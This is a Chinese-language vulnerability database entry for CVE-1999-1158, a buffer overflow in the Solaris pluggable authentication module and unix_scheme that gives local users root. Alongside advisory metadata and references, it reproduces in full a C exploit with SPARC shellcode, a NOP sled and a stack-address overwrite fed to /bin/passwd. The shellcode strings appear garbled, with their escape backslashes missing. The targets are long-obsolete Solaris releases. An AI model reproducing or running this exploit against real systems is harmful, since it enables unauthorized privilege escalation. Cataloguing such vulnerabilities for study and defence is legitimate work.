Solaris pluggable authentication module（PAM）,unix

Solaris pluggable authentication module（PAM）,unix_scheme漏洞

漏洞ID	1105284	漏洞类型	缓冲区溢出
发布时间	1997-02-25	更新时间	1997-05-13
CVE编号	CVE-1999-1158	CNNVD-ID	CNNVD-199705-013
漏洞平台	Solaris	CVSS评分	7.2

|漏洞来源

https://www.exploit-db.com/exploits/19158
https://www.securityfocus.com/bid/83036
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-199705-013

|漏洞详情

（1）Solaris2.5.1和2.5版本上运行的pluggableauthenticationmodule（PAM）和（2）Solaris2.4和2.3版本上运行的unix_scheme存在漏洞。本地用户可以通过使用如passwd、yppasswd和nispasswd的模块的程序获得根权限。

|漏洞EXP

/*
source: http://www.securityfocus.com/bid/201/info

There is a buffer overflow condition on arguments in Pluggable Authentication Modules (PAM) and unix_scheme (5.4 and 5.3). Therefore, an unauthorized user could exploit this vulnerability via the passwd program to gain root access. Under SunOS 5.5.1, 5.5.1_x86, 5.5, 5.5_x86, yppasswd and nispasswd are hard links to the passwd program and therefore are also vulnerable. Under SunOS 5.4 and 5.3, passwd, yppasswd, and nispasswd are separate programs but they dynamically link unix_scheme and are affected. 
*/

/*
This is for Solaris 2.5.(1) !
With argv[1] you can modify the stack offset (+-500) if you have troubles
...
*/

#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <unistd.h>

#define BUF_LENGTH      1100
#define EXTRA           1200
#define STACK_OFFSET    3800
#define SPARC_NOP       0xa61cc013

u_char sparc_shellcode[] =
"x82x10x20xcaxa6x1cxc0x13x90x0cxc0x13x92x0cxc0x13"
"xa6x04xe0x01x91xd4xffxffx2dx0bxd8x9axacx15xa1x6e"
"x2fx0bxdcxdax90x0bx80x0ex92x03xa0x08x94x1ax80x0a"
"x9cx03xa0x10xecx3bxbfxf0xdcx23xbfxf8xc0x23xbfxfc"
"x82x10x20x3bx91xd4xffxff"
;

u_long get_sp(void)
{
  __asm__("mov %sp,%i0 n");
}

void main(int argc, char *argv[])
{
  char buf[BUF_LENGTH + EXTRA];
  long targ_addr;
  u_long *long_p;
  u_char *char_p;
  int i, code_length = strlen(sparc_shellcode),dso=0;

  if(argc > 1) dso=atoi(argv[1]);

  long_p =(u_long *)  buf;
    targ_addr = get_sp() - STACK_OFFSET - dso;

  for (i = 0; i < (BUF_LENGTH - code_length) / sizeof(u_long); i++)
    *long_p++ = SPARC_NOP;

  char_p = (u_char *) long_p;

  for (i = 0; i < code_length; i++)
    *char_p++ = sparc_shellcode[i];

  long_p = (u_long *) char_p;


  for (i = 0; i < EXTRA / sizeof(u_long); i++)
    *long_p++ =targ_addr;

  printf("Jumping to address 0x%lx B[%d] E[%d] SO[%d]n",
  targ_addr,BUF_LENGTH,EXTRA,STACK_OFFSET);
  execl("/bin/passwd", "passwd", buf,(char *) 0);
  perror("execl failed");
}

|受影响的产品

Sun Solaris 2.5.1

Sun Solaris 2.5

Sun Solaris 2.4

Sun Solaris 2.3

|参考资料

来源:SUN
名称:00139
链接:http://sunsolve.sun.com/pub-cgi/retrieve.pl?doctype=coll&doc=secbull/139&type=0&nav=sec.sba
来源:AUSCERT
名称:AA-97.09
链接:ftp://ftp.auscert.org.au/pub/auscert/advisory/AA-97.09.Solaris.passwd.buffer.overrun.vul

相关推荐: Berkeley Sendmail Daemon Mode Vulnerability

Berkeley Sendmail Daemon Mode Vulnerability 漏洞ID 1105159 漏洞类型 Input Validation Error 发布时间 1996-11-16 更新时间 1996-11-16 CVE编号 N/A CNN…

文章版权归作者所有，未经允许请勿转载。

THE END